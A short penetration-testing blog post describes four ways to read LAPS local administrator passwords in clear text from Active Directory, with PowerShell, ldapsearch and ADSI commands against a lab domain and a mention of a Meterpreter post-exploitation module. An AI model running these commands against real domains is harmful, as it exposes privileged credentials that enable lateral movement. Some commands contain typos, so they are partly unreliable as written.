This blog post is inspired from Rob ‘mubix’ Fuller post on “Dump LAPS passwords with ldapsearch“. So in this blog post we will explore different methods or ways to dump LAPS password in clear text. By Default all the Domain Admins have view access to ms-MCS-AdmPwd attribute. Lets have a look at the following ways in which we can dump the LAPS password
Active Directory Module: Lets say the machine has RSAT enabled and user can import the active directory module. After importing the Active Directory module fire the cmdlet: “Get-ADComputer” and look for the attribute ‘ms-MCS-AdmPwd’ .
Import-module activdirectory Get-ADComputer -Identity LAB-WIN7CLONE -properties *
Meterpreter: If you have a shiny meterpreter session running, You can run the post expolitation module ‘enum_laps’. By running this command you will get Distinguised Name, ms-MCS-AdmPwd, ms-MCS-AdmPwdExpirationTime and DNS hostname.
run this command from meterpreter session:
LDAP Search: As mentioned in the blog post of Rob ‘mubix’ Fuller, we will use ldapsearch from our very own kali linux box to dump ‘ms-MCS-AdmPwd ‘attribute.
ldapsearch -x -h 10.10.10.254 -D <<username>> -w <<password>> -b "dc=AJLAB,dc=COM" "(ms-MCS-AdmPwd=*)" ms-MSC-AdmPwd
I have also created a video for all the above methods
ADSI: Probably the last method to dump LAPS password. Let’s say RSAT is not enabled on the windows box and if we want to get the attributes of ms-MCS-AdmPwd, Active Directory Service Interfaces to our rescue. The ADSI module can get the computer properties.
$domain = New-Object DirectoryServices.DirectoryEntry("LDAP://OU=Managed Computers- LAPS,DC=AJLAB,DC=COM") $user=$domain.Get_Children().find('CN=LAB-WIN7CLONE') $user | Format-List *
PS: Kindly comment any other cool methods to dump LAPS password.
Note: All of the above methods will only work if the user has view access to ms-MCS-AdmPwd attribute and Extended Rights have not been removed for users and groups.